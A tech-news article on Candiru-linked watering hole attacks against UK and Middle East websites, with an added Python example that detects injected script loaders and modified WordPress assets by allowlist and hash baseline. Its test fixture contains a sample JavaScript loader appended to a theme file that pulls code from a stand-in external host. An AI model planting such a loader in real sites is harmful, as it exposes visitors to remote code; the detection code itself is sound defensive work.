
Israel's Candiru Spyware Found Linked to Watering Hole Attacks in U.K and Middle East
2021-11-17 03:10

Israeli spyware vendor Candiru, which was added to an economic blocklist by the U.S. government this month, is reported to have waged "watering hole" attacks against high-profile entities in the U.K. and the Middle East, new findings reveal.

The strategic web compromises are believed to have occurred in two waves: the first commencing as early as March 2020 and ending in August 2020, and the second beginning in January 2021 and lasting until early August 2021, when the targeted websites were stripped clean of the malicious scripts.

Watering hole attacks are a form of highly targeted intrusion: they infect a specific group of end users by backdooring websites that members of the group are known to frequent, with the goal of opening a gateway into their machines for follow-on exploitation activities.

The original attack chains involved injecting JavaScript code, served from a remote attacker-controlled domain, into the websites. The script was designed to collect and exfiltrate IP geolocation and system information about the victim machine, proceeding further only if the operating system in question was either Windows or macOS, which suggests the campaign was orchestrated to target computers rather than mobile devices.

The second wave, observed in January 2021, was stealthier: instead of adding the malicious code straight to the main HTML page, the attackers modified legitimate WordPress scripts used by the websites, using them to load a script from a server under the attackers' control.
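Both waves described above come down to the same observable on the victim site: a script, either in the page HTML or appended to a legitimate WordPress asset, that pulls code from a host the site owner never sanctioned. The following is an added example, not code from the article or from any of the parties it describes, of how a site operator could detect both patterns: it flags script loads from hosts outside an allowlist (static `<script src>` tags and dynamic `element.src = ...` loaders alike) and compares static assets against a known-good SHA-256 baseline. All file contents, hashes, host names and paths are constructed placeholders.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample assets standing in for what a WordPress site serves.
SITE_FILES = {
    "index.html": (
        "<html><head>\n"
        '<script src="/wp-includes/js/jquery/jquery.min.js"></script>\n'
        '<script src="https://cdn.allowed-example.test/lib.js"></script>\n'
        "</head><body>site content</body></html>"
    ),
    "wp-includes/js/jquery/jquery.min.js": "/* jquery (constructed stub) */ var jQuery = {};",
    # Legitimate theme script with a constructed loader appended, mirroring
    # the "modify a legitimate WordPress script" pattern from the second wave.
    "wp-content/themes/site/theme.js": (
        "/* theme (constructed stub) */\n"
        "var s = document.createElement('script');\n"
        "s.src = 'https://static.placeholder-unknown.test/a.js';\n"
        "document.head.appendChild(s);\n"
    ),
}

# Hashes recorded when the static assets were known-good (constructed).
# theme.js was recorded before the loader was appended, so it will differ.
BASELINE_SHA256 = {
    "wp-includes/js/jquery/jquery.min.js": hashlib.sha256(
        b"/* jquery (constructed stub) */ var jQuery = {};").hexdigest(),
    "wp-content/themes/site/theme.js": hashlib.sha256(
        b"/* theme (constructed stub) */\n").hexdigest(),
}

# Hosts the site is expected to load scripts from (constructed allowlist).
ALLOWED_HOSTS = {"cdn.allowed-example.test"}

# <script src="..."> in HTML, and element.src = '...' assignments in JS.
HTML_SRC_RE = re.compile(r"""<script[^>]*\ssrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
JS_SRC_RE = re.compile(r"""\.src\s*=\s*["']([^"']+)["']""")


def script_urls(text):
    """Return every script URL referenced by a static tag or a dynamic loader."""
    return HTML_SRC_RE.findall(text) + JS_SRC_RE.findall(text)


def is_unexpected(url, allowed_hosts):
    """True for absolute http(s) URLs whose host is not on the allowlist."""
    if url.startswith("//"):          # protocol-relative URLs still name a host
        url = "https:" + url
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        return False                  # relative path: same origin, expected
    return parsed.netloc.lower() not in allowed_hosts


def find_unexpected_loaders(files, allowed_hosts):
    """(path, url) pairs where a file pulls a script from an unlisted host."""
    hits = []
    for path, text in files.items():
        for url in script_urls(text):
            if is_unexpected(url, allowed_hosts):
                hits.append((path, url))
    return hits


def find_modified_files(files, baseline):
    """Paths whose current SHA-256 no longer matches the recorded baseline."""
    changed = []
    for path, expected in baseline.items():
        current = hashlib.sha256(files.get(path, "").encode()).hexdigest()
        if current != expected:
            changed.append(path)
    return changed


def audit(files, baseline, allowed_hosts):
    """Combine both checks into one report a scheduled monitoring job could emit."""
    return {
        "unexpected_loaders": find_unexpected_loaders(files, allowed_hosts),
        "modified_files": find_modified_files(files, baseline),
    }


if __name__ == "__main__":
    for key, value in audit(SITE_FILES, BASELINE_SHA256, ALLOWED_HOSTS).items():
        print(key, value)
```

The two checks are complementary: the hash comparison catches any change to a static asset regardless of what was inserted, while the loader scan also covers dynamically generated pages that have no stable baseline. In practice the baseline would be rebuilt on every legitimate deployment and the allowlist kept in step with a Content-Security-Policy `script-src` directive, so that a browser would refuse the unlisted host even if the scan missed it.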

The campaign's links to Candiru stem from the fact that some of the command-and-control servers used by the attackers resemble domains previously identified as belonging to the Israeli company, and that Candiru's arsenal features browser-based remote code execution exploits, raising the possibility that "The operators of the watering holes are customers of Candiru."


News URL

https://thehackernews.com/2021/11/israels-candiru-spyware-found-linked-to.html